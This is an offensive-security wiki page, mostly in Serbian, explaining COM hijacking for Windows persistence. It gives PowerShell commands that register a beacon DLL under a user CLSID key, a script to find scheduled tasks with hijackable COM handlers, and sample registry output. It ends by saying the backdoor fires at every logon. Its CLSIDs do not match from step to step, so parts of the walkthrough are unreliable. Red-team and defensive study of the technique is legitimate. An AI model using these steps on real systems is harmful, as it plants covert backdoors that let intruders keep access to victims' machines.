COM Hijacking

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Pretraživanje nepostojećih COM komponenti

Kako se vrednosti HKCU mogu menjati od strane korisnika, COM Hijacking se može koristiti kao perzistentni mehanizam. Koristeći procmon, lako je pronaći pretraživane COM registre koji ne postoje, a koje napadač može kreirati da bi postigao perzistenciju. Filteri:

RegOpenKey operacije.
gde je Rezultat IME NIJE PRONAĐENO.
i Putanja se završava sa InprocServer32.

Kada odlučite koju nepostojeću COM komponentu da imitirate, izvršite sledeće komande. Budite oprezni ako odlučite da imitirate COM koji se učitava svake nekoliko sekundi, jer to može biti prekomerno.

New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"

Hijackable Task Scheduler COM components

Windows Tasks koriste prilagođene okidače za pozivanje COM objekata i pošto se izvršavaju putem Task Scheduler-a, lakše je predvideti kada će biti aktivirani.

# Prikaži COM CLSID-ove
$Tasks = Get-ScheduledTask

foreach ($Task in $Tasks)
{
if ($Task.Actions.ClassId -ne $null)
{
if ($Task.Triggers.Enabled -eq $true)
{
$usersSid = "S-1-5-32-545"
$usersGroup = Get-LocalGroup | Where-Object { $_.SID -eq $usersSid }

if ($Task.Principal.GroupId -eq $usersGroup)
{
Write-Host "Ime zadatka: " $Task.TaskName
Write-Host "Putanja zadatka: " $Task.TaskPath
Write-Host "CLSID: " $Task.Actions.ClassId
Write-Host
}
}
}
}

# Uzorak izlaza:
# Ime zadatka:  Primer
# Putanja zadatka:  \Microsoft\Windows\Primer\
# CLSID:  {1936ED8A-BD93-3213-E325-F38D112938E1}
# [više poput prethodnog...]

Proverom izlaza možete odabrati jedan koji će biti izvršen svaki put kada se korisnik prijavi na primer.

Sada pretražujući CLSID {1936ED8A-BD93-3213-E325-F38D112938EF} u HKEY_CLASSES_ROOT\CLSID i u HKLM i HKCU, obično ćete otkriti da vrednost ne postoji u HKCU.

# Exists in HKCR\CLSID\
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"

Name           Property
----           --------
InprocServer32 (default)      : C:\Windows\system32\some.dll
ThreadingModel : Both

# Exists in HKLM
Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize

Name                                   Property
----                                   --------
{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler

# Doesn't exist in HKCU
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.

Zatim, možete jednostavno kreirati HKCU unos i svaki put kada se korisnik prijavi, vaša backdoor će se aktivirati.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousCreate MSI with WIX NextDll Hijacking

Last updated 4 months ago

New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll" New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"

# Prikaži COM CLSID-ove $Tasks = Get-ScheduledTask foreach ($Task in $Tasks) { if ($Task.Actions.ClassId -ne $null) { if ($Task.Triggers.Enabled -eq $true) { $usersSid = "S-1-5-32-545" $usersGroup = Get-LocalGroup | Where-Object { $_.SID -eq $usersSid } if ($Task.Principal.GroupId -eq $usersGroup) { Write-Host "Ime zadatka: " $Task.TaskName Write-Host "Putanja zadatka: " $Task.TaskPath Write-Host "CLSID: " $Task.Actions.ClassId Write-Host } } } } # Uzorak izlaza: # Ime zadatka: Primer # Putanja zadatka: \Microsoft\Windows\Primer\ # CLSID: {1936ED8A-BD93-3213-E325-F38D112938E1} # [više poput prethodnog...]

# Exists in HKCR\CLSID\ Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}" Name Property ---- -------- InprocServer32 (default) : C:\Windows\system32\some.dll ThreadingModel : Both # Exists in HKLM Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize Name Property ---- -------- {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler # Doesn't exist in HKCU PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.